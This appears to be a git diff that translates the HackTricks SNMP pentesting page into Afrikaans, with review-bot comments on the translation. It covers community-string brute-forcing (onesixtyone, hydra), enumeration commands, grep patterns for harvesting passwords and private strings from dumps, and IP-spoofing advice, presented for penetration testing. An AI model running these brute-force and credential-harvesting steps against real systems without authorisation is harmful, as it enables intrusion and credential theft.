-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. +**Onmiddellik beskikbare opset vir kwesbaarheidsassessering & penetrasietoetsing**. Voer 'n volledige pentest uit van enige plek met 20+ gereedskap en funksies wat strek van rekognisering tot verslagdoening. Ons vervang nie pentesters nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle 'n bietjie tyd te gee om dieper te graaf, skulpe te kraak en pret te hê. {% embed url="https://pentest-tools.com/" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
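Review bot: the SIZE entry in smtp-commands.md mistranslates "remote server" as "afgelewerde bediener" (delivered server); use "eksterne bediener" or "afgeleë bediener". Two smaller points in the same hunk: under AUTH, "stel die kliënt homself aan die bediener bekend" (introduces itself) loses the technical meaning of "authenticates itself", so prefer "outentiseer die kliënt homself by die bediener"; and under RSET, "die aan die gang gesette e-posoordrag" is awkward for "the ongoing email transmission", "die lopende e-posoordrag" reads naturally. The sponsor paragraph repeats the "skulpe te kraak" rendering of "pop shells" (command shells, not seashells).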
diff --git a/network-services-pentesting/pentesting-snmp/README.md b/network-services-pentesting/pentesting-snmp/README.md index cd900fe30..ef70d0d00 100644 --- a/network-services-pentesting/pentesting-snmp/README.md +++ b/network-services-pentesting/pentesting-snmp/README.md @@ -2,132 +2,126 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
\ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers geskep is, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin om belonings tot **$100,000** te verdien! {% embed url="https://go.intigriti.com/hacktricks" %} -## Basic Information - -**SNMP - Simple Network Management Protocol** is a protocol used to monitor different devices in the network (like routers, switches, printers, IoTs...). +## Basiese Inligting +**SNMP - Simple Network Management Protocol** is 'n protokol wat gebruik word om verskillende toestelle in die netwerk te monitor (soos roeteryers, skakelaars, drukkers, IoT-toestelle...). ``` PORT STATE SERVICE REASON VERSION 161/udp open snmp udp-response ttl 244 ciscoSystems SNMPv3 server (public) ``` - {% hint style="info" %} -SNMP also uses the port **162/UDP** for **traps**. These are data **packets sent from the SNMP server to the client without being explicitly requested**. +SNMP gebruik ook die poort **162/UDP** vir **traps**. Dit is data **pakkies wat van die SNMP-bediener na die kliënt gestuur word sonder om eksplisiet aangevra te word**. {% endhint %} ### MIB -To ensure that SNMP access works across manufacturers and with different client-server combinations, the **Management Information Base (MIB)** was created. MIB is an **independent format for storing device information**. A MIB is a **text** file in which all queryable **SNMP objects** of a device are listed in a **standardized** tree hierarchy. 
It contains at **least one `Object Identifier` (`OID`)**, which, in addition to the necessary **unique address** and a **name**, also provides information about the type, access rights, and a description of the respective object\ -MIB files are written in the `Abstract Syntax Notation One` (`ASN.1`) based ASCII text format. The **MIBs do not contain data**, but they explain **where to find which information** and what it looks like, which returns values for the specific OID, or which data type is used. +Om te verseker dat SNMP-toegang oor vervaardigers en met verskillende kliënt-bediener kombinasies werk, is die **Management Information Base (MIB)** geskep. MIB is 'n **onafhanklike formaat vir die stoor van toestelinligting**. 'n MIB is 'n **tekslêer** waarin alle navraagbare **SNMP-voorwerpe** van 'n toestel in 'n **gestandaardiseerde** boomhiërargie gelys word. Dit bevat ten minste een `Object Identifier` (`OID`), wat, naas die nodige **unieke adres** en 'n **naam**, ook inligting oor die tipe, toegangsregte en 'n beskrywing van die betrokke voorwerp verskaf.\ +MIB-lêers is in die `Abstract Syntax Notation One` (`ASN.1`) gebaseerde ASCII-teksformaat geskryf. Die **MIB's bevat nie data nie**, maar verduidelik **waar om watter inligting te vind** en hoe dit lyk, wat terugkeerwaardes vir die spesifieke OID is, of watter datatipe gebruik word. ### OIDs -**Object Identifiers (OIDs)** play a crucial role. These unique identifiers are designed to manage objects within a **Management Information Base (MIB)**. +**Object Identifiers (OIDs)** speel 'n belangrike rol. Hierdie unieke identifiseerders is ontwerp om voorwerpe binne 'n **Management Information Base (MIB)** te bestuur. -The highest levels of MIB object IDs, or OIDs, are allocated to diverse standard-setting organizations. It is within these top levels that the framework for global management practices and standards is established. 
+Die hoogste vlakke van MIB-voorwerp-ID's, of OIDs, word toegewys aan diverse standaardstelorganisasies. Dit is binne hierdie topvlakke dat die raamwerk vir globale bestuurspraktyke en standaarde gevestig word. -Furthermore, vendors are granted the liberty to establish private branches. Within these branches, they have the **autonomy to include managed objects pertinent to their own product lines**. This system ensures that there is a structured and organized method for identifying and managing a wide array of objects across different vendors and standards. +Verkopers word ook die vryheid gegee om private takke te vestig. Binne hierdie takke het hulle die **selfstandigheid om bestuurde voorwerpe wat relevant is vir hul eie produklyne in te sluit**. Hierdie stelsel verseker dat daar 'n gestruktureerde en georganiseerde metode is om 'n wye verskeidenheid voorwerpe oor verskillende verkopers en standaarde te identifiseer en bestuur. ![](../../.gitbook/assets/snmp\_oid\_mib\_tree.png) -You can **navigate** through an **OID tree** from the web here: [http://www.oid-info.com/cgi-bin/display?tree=#focus](http://www.oid-info.com/cgi-bin/display?tree=#focus) or **see what a OID means** (like `1.3.6.1.2.1.1`) accessing [http://oid-info.com/get/1.3.6.1.2.1.1](http://oid-info.com/get/1.3.6.1.2.1.1).\ -There are some **well-known OIDs** like the ones inside [1.3.6.1.2.1](http://oid-info.com/get/1.3.6.1.2.1) that references MIB-2 defined Simple Network Management Protocol (SNMP) variables. And from the **OIDs pending from this one** you can obtain some interesting host data (system data, network data, processes data...) 
+Jy kan deur 'n **OID-boom** op die web **navigeer** deur hier te gaan: [http://www.oid-info.com/cgi-bin/display?tree=#focus](http://www.oid-info.com/cgi-bin/display?tree=#focus) of **sien wat 'n OID beteken** (soos `1.3.6.1.2.1.1`) deur [http://oid-info.com/get/1.3.6.1.2.1.1](http://oid-info.com/get/1.3.6.1.2.1.1) te besoek.\ +Daar is 'n paar **bekende OIDs** soos diegene binne [1.3.6.1.2.1](http://oid-info.com/get/1.3.6.1.2.1) wat verwys na MIB-2 gedefinieerde Simple Network Management Protocol (SNMP) veranderlikes. En van die **OID's wat van hierdie een afhang** kan jy interessante gasheerdata verkry (sisteme data, netwerkdata, prosesse data...) -### **OID Example** +### **OID-voorbeeld** -[**Example from here**](https://www.netadmintools.com/snmp-mib-and-oids/): +[**Voorbeeld van hier**](https://www.netadmintools.com/snmp-mib-and-oids/): **`1 . 3 . 6 . 1 . 4 . 1 . 1452 . 1 . 2 . 5 . 1 . 3. 21 . 1 . 4 . 7`** -Here is a breakdown of this address. +Hier is 'n uiteensetting van hierdie adres. -* 1 – this is called the ISO and it establishes that this is an OID. This is why all OIDs start with “1” -* 3 – this is called ORG and it is used to specify the organization that built the device. -* 6 – this is the dod or the Department of Defense which is the organization that established the Internet first. -* 1 – this is the value of the internet to denote that all communications will happen through the Internet. -* 4 – this value determines that this device is made by a private organization and not a government one. -* 1 – this value denotes that the device is made by an enterprise or a business entity. +* 1 - dit word die ISO genoem en dit stel vas dat dit 'n OID is. Dit is hoekom alle OIDs met "1" begin. +* 3 - dit word ORG genoem en dit word gebruik om die organisasie wat die toestel gebou het, te spesifiseer. +* 6 - dit is die dod of die Department of Defense wat die organisasie was wat die Internet eerste gevestig het. 
+* 1 - dit is die waarde van die internet om aan te dui dat alle kommunikasie deur die Internet sal plaasvind. +* 4 - hierdie waarde bepaal dat hierdie toestel deur 'n private organisasie en nie 'n regeringstoestel gemaak is nie. +* 1 - hierdie waarde dui aan dat die toestel deur 'n onderneming of 'n besigheidsentiteit gemaak is. -These first six values tend to be the same for all devices and they give you the basic information about them. This sequence of numbers will be the same for all OIDs, except when the device is made by the government. +Hierdie eerste ses waardes is gewoonlik dieselfde vir alle toestelle en dit gee jou die basiese inligting daaroor. Hierdie reeks getalle sal dieselfde wees vir alle OIDs, behalwe as die toestel deur die regering gemaak is. -Moving on to the next set of numbers. +Gaan voort na die volgende stel getalle. -* 1452 – gives the name of the organization that manufactured this device. -* 1 – explains the type of device. In this case, it is an alarm clock. -* 2 – determines that this device is a remote terminal unit. +* 1452 - gee die naam van die organisasie wat hierdie toestel vervaardig het. +* 1 - verduidelik die tipe toestel. In hierdie geval is dit 'n wekker. +* 2 - bepaal dat hierdie toestel 'n afgeleë terminaleenheid is. -The rest of the values give specific information about the device. +Die res van die waardes gee spesifieke inligting oor die toestel. -* 5 – denotes a discrete alarm point. -* 1 – specific point in the device -* 3 – port -* 21 – address of the port -* 1 – display for the port -* 4 – point number -* 7 – state of the point +* 5 - dui op 'n diskrete alarm punt. 
+* 1 - spesifieke punt in die toestel +* 3 - poort +* 21 - adres van die poort +* 1 - vertoon vir die poort +* 4 - puntnommer +* 7 - toestand van die punt -### SNMP Versions +### SNMP-weergawes -There are 2 important versions of SNMP: +Daar is 2 belangrike weergawes van SNMP: -* **SNMPv1**: Main one, it is still the most frequent, the **authentication is based on a string** (community string) that travels in **plain-text** (all the information travels in plain text). **Version 2 and 2c** send the **traffic in plain text** also and uses a **community string as authentication**. -* **SNMPv3**: Uses a better **authentication** form and the information travels **encrypted** using (**dictionary attack** could be performed but would be much harder to find the correct creds than in SNMPv1 and v2). +* **SNMPv1**: Die belangrikste een, dit is steeds die mees voorkomende, die **outentisering is gebaseer op 'n string** (gemeenskapsnaam) wat in **platte teks** reis (alle inligting reis in platte teks). **Weergawe 2 en 2c** stuur die **verkeer ook in platte teks** en gebruik 'n **gemeenskapsnaam as outentisering**. +* **SNMPv3**: Gebruik 'n beter **outentiseringsvorm** en die inligting reis **gekripteer** met behulp van (daar kan 'n **woordeboekaanval** uitgevoer word, maar dit sal baie moeiliker wees om die korrekte geloofsbriewe as in SNMPv1 en v2 te vind). 
-### Community Strings +### Gemeenskapsname -As mentioned before, **in order to access the information saved on the MIB you need to know the community string on versions 1 and 2/2c and the credentials on version 3.**\ -The are **2 types of community strings**: +Soos voorheen genoem, **om toegang te verkry tot die inligting wat in die MIB gestoor is, moet jy die gemeenskapsnaam in weergawes 1 en 2/2c weet en die geloofsbriewe in weergawe 3.**\ +Daar is **2 tipes gemeenskapsname**: -* **`public`** mainly **read only** functions -* **`private`** **Read/Write** in general +* **`public`** hoofsaaklik **slegs lees** funksies +* **`private`** **Lees/Skryf** in die algemeen -Note that **the writability of an OID depends on the community string used**, so **even** if you find that "**public**" is being used, you could be able to **write some values.** Also, there **may** exist objects which are **always "Read Only".**\ -If you try to **write** an object a **`noSuchName` or `readOnly` error** is received\*\*.\*\* +Let daarop dat **die skryfbaarheid van 'n OID afhang van die gebruikte gemeenskapsnaam**, so **selfs** as jy vind dat "**public**" gebruik word, kan jy dalk in staat wees om **waardes te skryf**. Daar **kan** ook voorwerpe wees wat **altyd "Slegs lees" is**.\ +As jy probeer om 'n voorwerp te **skryf**, sal 'n **`noSuchName` of `readOnly`-fout** ontvang word\*\*.\*\* -In versions 1 and 2/2c if you to use a **bad** community string the server wont **respond**. So, if it responds, a **valid community strings was used**. +In weergawes 1 en 2/2c, as jy 'n **slegte** gemeenskapsnaam gebruik, sal die bediener nie **reageer** nie. Dus, as dit reageer, is 'n **geldige gemeenskapsnaam gebruik**. 
-## Ports +## Poorte -[From Wikipedia](https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol#:~:text=All%20SNMP%20messages%20are%20transported,port%20161%20in%20the%20agent.): +[Vanaf Wikipedia](https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol#:~:text=All%20SNMP%20messages%20are%20transported,port%20161%20in%20the%20agent.): -* The SNMP agent receives requests on UDP port **161**. -* The manager receives notifications ([Traps](https://en.wikipedia.org/wiki/Simple\_Network\_Management\_Protocol#Trap) and [InformRequests](https://en.wikipedia.org/wiki/Simple\_Network\_Management\_Protocol#InformRequest)) on port **162**. -* When used with [Transport Layer Security](https://en.wikipedia.org/wiki/Transport\_Layer\_Security) or [Datagram Transport Layer Security](https://en.wikipedia.org/wiki/Datagram\_Transport\_Layer\_Security), requests are received on port **10161** and notifications are sent to port **10162**. +* Die SNMP-agent ontvang versoek op UDP-poort **161**. +* Die bestuurder ontvang kennisgewings ([Traps](https://en.wikipedia.org/wiki/Simple\_Network\_Management\_Protocol#Trap) en [InformRequests](https://en.wikipedia.org/wiki/Simple\_Network\_Management\_Protocol#InformRequest)) op poort **162**. +* Wanneer dit saam met [Transport Layer Security](https://en.wikipedia.org/wiki/Transport\_Layer\_Security) of [Datagram Transport Layer Security](https://en.wikipedia.org/wiki/Datagram\_Transport\_Layer\_Security) gebruik word, word versoek op poort **10161** ontvang en kennisgewings word na poort **10162** gestuur. -## Brute-Force Community String (v1 and v2c) +## Brute-Force Gemeenskapsnaam (v1 en v2c) -To **guess the community string** you could perform a dictionary attack. Check [here different ways to perform a brute-force attack against SNMP](../../generic-methodologies-and-resources/brute-force.md#snmp). A frequently used community string is `public`. 
- -## Enumerating SNMP - -It is recommanded to install the following to see whats does mean **each OID gathered** from the device: +Om die gemeenskapsnaam te **raai**, kan jy 'n woordelysaanval uitvoer. Kyk [hier verskillende maniere om 'n brute-force-aanval teen SNMP uit te voer](../../generic-methodologies-and-resources/brute-force.md#snmp). 'n Gemeenskapsnaam wat dikwels gebruik word, is `public`. +## Opstel van SNMP +Dit word aanbeveel om die volgende te installeer om te sien wat beteken **elke OID wat ingesamel is** van die toestel: ```bash apt-get install snmp-mibs-downloader download-mibs # Finally comment the line saying "mibs :" in /etc/snmp/snmp.conf sudo vi /etc/snmp/snmp.conf ``` - -If you know a valid community string, you can access the data using **SNMPWalk** or **SNMP-Check**: - +As jy 'n geldige gemeenskapsnaam weet, kan jy toegang verkry tot die data deur gebruik te maak van **SNMPWalk** of **SNMP-Check**: ```bash snmpbulkwalk -c [COMM_STRING] -v [VERSION] [IP] . #Don't forget the final dot snmpbulkwalk -c public -v2c 10.10.11.136 . 
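Review bot: the heading "## Opstel van SNMP" turns "Enumerating SNMP" into "Setting up SNMP", which mislabels the whole section that follows (snmpwalk / snmp-check usage); use "## SNMP-enumerasie". Also in this hunk: the header count drops from 132 to 126 lines because the blank lines around the ``` fences were removed (for example the blank line between "IoT-toestelle...)." and the following "```" and the one before "{% hint style="info" %}"); a translation-only PR should leave whitespace untouched so GitBook rendering and later diffs stay clean. The SNMPv3 bullet carries the unfinished "reis **gekripteer** met behulp van (" straight from the English "travels **encrypted** using (", where the source sentence is itself truncated; fix the English first rather than propagate the gap. Terminology: "roeteryers" for routers should be "roeteerders", "versoek" in "ontvang versoek op UDP-poort 161" should be plural "versoeke", and "(sisteme data, netwerkdata, prosesse data...)" reads better as "(stelseldata, netwerkdata, prosesdata...)".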
@@ -143,178 +137,159 @@ nmap --script "snmp* and not snmp-brute" braa @:.1.3.6.* #Bruteforce specific OID ``` - -Thanks to extended queries (download-mibs), it is possible to enumerate even more about the system with the following command : - +Dankie aan uitgebreide navrae (laai-mibs af), is dit moontlik om selfs meer oor die stelsel op te som met die volgende bevel: ```bash snmpwalk -v X -c public NET-SNMP-EXTEND-MIB::nsExtendOutputFull ``` +**SNMP** het baie inligting oor die gasheer en dinge wat jy interessant mag vind, is: **Netwerkinterfaces** (IPv4 en **IPv6**-adres), Gebruikersname, Bedryfstyd, Bediener / OS-weergawe, en **prosesse** wat **loop** (kan wagwoorde bevat).... -**SNMP** has a lot of information about the host and things that you may find interesting are: **Network interfaces** (IPv4 and **IPv6** address), Usernames, Uptime, Server/OS version, and **processes** +### **Gevaarlike instellings** -**running** (may contain passwords).... +In die wêreld van netwerkbestuur is sekere konfigurasies en parameters sleutel tot omvattende monitering en beheer. -### **Dangerous Settings** +### Toegangsinstellings -In the realm of network management, certain configurations and parameters are key to ensuring comprehensive monitoring and control. +Twee hoofinstellings maak toegang tot die **volledige OID-boom** moontlik, wat 'n belangrike komponent in netwerkbestuur is: -### Access Settings +1. **`rwuser noauth`** is ingestel om volledige toegang tot die OID-boom sonder die nodigheid van outentifikasie toe te laat. Hierdie instelling is eenvoudig en maak onbeperkte toegang moontlik. -Two main settings enable access to the **full OID tree**, which is a crucial component in network management: +2. Vir meer spesifieke beheer kan toegang verleen word deur gebruik te maak van: +- **`rwcommunity`** vir **IPv4**-adresse, en +- **`rwcommunity6`** vir **IPv6**-adresse. -1. **`rwuser noauth`** is set to permit full access to the OID tree without the need for authentication. 
This setting is straightforward and allows for unrestricted access. +Beide opdragte vereis 'n **gemeenskapsnaam** en die betrokke IP-adres, en bied volledige toegang ongeag die oorsprong van die versoek. -2. For more specific control, access can be granted using: - - **`rwcommunity`** for **IPv4** addresses, and - - **`rwcommunity6`** for **IPv6** addresses. - -Both commands require a **community string** and the relevant IP address, offering full access irrespective of the request's origin. +### SNMP-parameters vir Microsoft Windows -### SNMP Parameters for Microsoft Windows +'n Reeks **Bestuursinligtingsbasis (MIB) waardes** word gebruik om verskillende aspekte van 'n Windows-stelsel te monitor deur SNMP: -A series of **Management Information Base (MIB) values** are utilized to monitor various aspects of a Windows system through SNMP: - -- **System Processes**: Accessed via `1.3.6.1.2.1.25.1.6.0`, this parameter allows for the monitoring of active processes within the system. -- **Running Programs**: The `1.3.6.1.2.1.25.4.2.1.2` value is designated for tracking currently running programs. -- **Processes Path**: To determine where a process is running from, the `1.3.6.1.2.1.25.4.2.1.4` MIB value is used. -- **Storage Units**: The monitoring of storage units is facilitated by `1.3.6.1.2.1.25.2.3.1.4`. -- **Software Name**: To identify the software installed on a system, `1.3.6.1.2.1.25.6.3.1.2` is employed. -- **User Accounts**: The `1.3.6.1.4.1.77.1.2.25` value allows for the tracking of user accounts. -- **TCP Local Ports**: Finally, `1.3.6.1.2.1.6.13.1.3` is designated for monitoring TCP local ports, providing insight into active network connections. +- **Stelselprosesse**: Toegang tot `1.3.6.1.2.1.25.1.6.0`, hierdie parameter maak dit moontlik om aktiewe prosesse binne die stelsel te monitor. +- **Lopende Programme**: Die waarde `1.3.6.1.2.1.25.4.2.1.2` is bedoel vir die opspoor van tans lopende programme. 
+- **Prosessepad**: Om vas te stel waar 'n proses vanaf loop, word die MIB-waarde `1.3.6.1.2.1.25.4.2.1.4` gebruik. +- **Stoor-eenhede**: Die monitering van stoor-eenhede word fasiliteer deur `1.3.6.1.2.1.25.2.3.1.4`. +- **Sagtewarenaam**: Om die sagteware wat op 'n stelsel geïnstalleer is te identifiseer, word `1.3.6.1.2.1.25.6.3.1.2` gebruik. +- **Gebruikersrekeninge**: Die waarde `1.3.6.1.4.1.77.1.2.25` maak dit moontlik om gebruikersrekeninge te monitor. +- **TCP Plaaslike Poorte**: Laastens, word `1.3.6.1.2.1.6.13.1.3` aangewys vir die monitering van TCP plaaslike poorte, wat insig bied in aktiewe netwerkverbindings. ### Cisco -Take a look to this page if you are Cisco equipment: +Kyk na hierdie bladsy as jy Cisco-toerusting het: {% content-ref url="cisco-snmp.md" %} [cisco-snmp.md](cisco-snmp.md) {% endcontent-ref %} -## From SNMP to RCE +## Van SNMP tot RCE -If you have the **string** that allows you to **write values** inside the SNMP service, you may be able to abuse it to **execute commands**: +As jy die **string** het wat jou in staat stel om waardes binne die SNMP-diens te **skryf**, kan jy dit moontlik misbruik om **opdragte uit te voer**: {% content-ref url="snmp-rce.md" %} [snmp-rce.md](snmp-rce.md) {% endcontent-ref %} -## **Massive SNMP** +## **Massiewe SNMP** -[Braa ](https://github.com/mteg/braa)is a mass SNMP scanner. The intended usage of such a tool is, of course, making SNMP queries – but unlike snmpwalk from net-snmp, it is able to query dozens or hundreds of hosts simultaneously, and in a single process. Thus, it consumes very few system resources and does the scanning VERY fast. +[Braa ](https://github.com/mteg/braa)is 'n massiewe SNMP-skandeerder. Die bedoeling van so 'n instrument is natuurlik om SNMP-navrae te maak - maar anders as snmpwalk van net-snmp, kan dit gelyktydig tientalle of honderde gasheerstelsels ondervra en in 'n enkele proses hanteer. Dit verbruik dus baie min stelselhulpbronne en doen die skandering BAIE vinnig. 
-Braa implements its OWN snmp stack, so it does NOT need any SNMP libraries like net-snmp. - -**Syntax:** braa \[Community-string]@\[IP of SNMP server]:\[iso id] +Braa implementeer sy EIE SNMP-stapel, dus het dit GEEN SNMP-biblioteke soos net-snmp nodig nie. +**Sintaksis:** braa \[Gemeenskapsnaam]@\[IP van SNMP-bediener]:\[iso-id] ```bash braa ignite123@192.168.1.125:.1.3.6.* ``` - -This can extract a lot MB of information that you cannot process manually. +Dit kan baie MB aan inligting onttrek wat jy nie handmatig kan verwerk nie. -So, lets look for the most interesting information (from [https://blog.rapid7.com/2016/05/05/snmp-data-harvesting-during-penetration-testing/](https://blog.rapid7.com/2016/05/05/snmp-data-harvesting-during-penetration-testing/)): +So, laat ons kyk vir die mees interessante inligting (vanaf [https://blog.rapid7.com/2016/05/05/snmp-data-harvesting-during-penetration-testing/](https://blog.rapid7.com/2016/05/05/snmp-data-harvesting-during-penetration-testing/)): -### **Devices** - -The process begins with the extraction of **sysDesc MIB data** (1.3.6.1.2.1.1.1.0) from each file to identify the devices. This is accomplished through the use of a **grep command**: - +### **Toestelle** +Die proses begin met die onttrekking van **sysDesc MIB-data** (1.3.6.1.2.1.1.1.0) uit elke lêer om die toestelle te identifiseer. Dit word bereik deur die gebruik van 'n **grep-opdrag**: ```bash grep ".1.3.6.1.2.1.1.1.0" *.snmp ``` +### **Identifiseer Privaat String** -### **Identify Private String** - -A crucial step involves identifying the **private community string** used by organizations, particularly on Cisco IOS routers. This string enables the extraction of **running configurations** from routers. The identification often relies on analyzing SNMP Trap data for the word "trap" with a **grep command**: - +'n Belangrike stap behels die identifisering van die **privaat gemeenskapsnaam** wat deur organisasies gebruik word, veral op Cisco IOS-roeternetwerke. 
Hierdie string maak dit moontlik om **lopende konfigurasies** van roeternetwerke te onttrek. Die identifikasie berus dikwels op die analise van SNMP Trap-data vir die woord "trap" met 'n **grep-opdrag**: ```bash grep -i "trap" *.snmp ``` +### **Gebruikersname/ Wagwoorde** -### **Usernames/Passwords** - -Logs stored within MIB tables are examined for **failed logon attempts**, which might accidentally include passwords entered as usernames. Keywords such as _fail_, _failed_, or _login_ are searched to find valuable data: - +Logs wat in MIB-tabelle gestoor word, word ondersoek vir **mislukte aanmeldingspogings**, wat per ongeluk wagwoorde kan insluit wat as gebruikersname ingevoer is. Sleutelwoorde soos _misluk_, _mislukte_, of _aanmelding_ word gesoek om waardevolle data te vind: ```bash grep -i "login\|fail" *.snmp ``` +### **E-posse** -### **Emails** - -Finally, to extract **email addresses** from the data, a **grep command** with a regular expression is used, focusing on patterns that match email formats: - +Uiteindelik, om **e-posadressse** uit die data te onttrek, word 'n **grep-opdrag** met 'n regulêre uitdrukking gebruik, wat fokus op patrone wat ooreenstem met e-posformate: ```bash grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" *.snmp ``` +## Wysiging van SNMP-waardes - -## Modifying SNMP values - -You can use _**NetScanTools**_ to **modify values**. You will need to know the **private string** in order to do so. +Jy kan _**NetScanTools**_ gebruik om waardes te **verander**. Jy sal die **privaat string** moet weet om dit te doen. ## Spoofing -If there is an ACL that only allows some IPs to query the SMNP service, you can spoof one of this addresses inside the UDP packet an sniff the traffic. +As daar 'n ACL is wat slegs sekere IP-adresse toelaat om die SNMP-diens te ondervra, kan jy een van hierdie adresse in die UDP-pakket vervals en die verkeer afluister. 
-## Examine SNMP Configuration files +## Ondersoek SNMP-konfigurasie lêers * snmp.conf * snmpd.conf * snmp-config.xml -## HackTricks Automatic Commands - +## HackTricks Outomatiese Opdragte ``` Protocol_Name: SNMP #Protocol Abbreviation if there is one. Port_Number: 161 #Comma separated if there is more than one. Protocol_Description: Simple Network Managment Protocol #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for SNMP - Note: | - SNMP - Simple Network Management Protocol is a protocol used to monitor different devices in the network (like routers, switches, printers, IoTs...). +Name: Notes +Description: Notes for SNMP +Note: | +SNMP - Simple Network Management Protocol is a protocol used to monitor different devices in the network (like routers, switches, printers, IoTs...). - https://book.hacktricks.xyz/pentesting/pentesting-snmp +https://book.hacktricks.xyz/pentesting/pentesting-snmp Entry_2: - Name: SNMP Check - Description: Enumerate SNMP - Command: snmp-check {IP} +Name: SNMP Check +Description: Enumerate SNMP +Command: snmp-check {IP} Entry_3: - Name: OneSixtyOne - Description: Crack SNMP passwords - Command: onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt {IP} -w 100 +Name: OneSixtyOne +Description: Crack SNMP passwords +Command: onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt {IP} -w 100 Entry_4: - Name: Nmap - Description: Nmap snmp (no brute) - Command: nmap --script "snmp* and not snmp-brute" {IP} +Name: Nmap +Description: Nmap snmp (no brute) +Command: nmap --script "snmp* and not snmp-brute" {IP} Entry_5: - Name: Hydra Brute Force - Description: Need Nothing - Command: hydra -P {Big_Passwordlist} -v {IP} snmp +Name: Hydra Brute Force +Description: Need Nothing +Command: hydra -P {Big_Passwordlist} -v {IP} snmp ``` - \ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, 
for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Foutbounty wenk**: **Teken aan** vir **Intigriti**, 'n premium **foutbounty platform geskep deur hackers, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) en begin om belonings te verdien tot **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %}
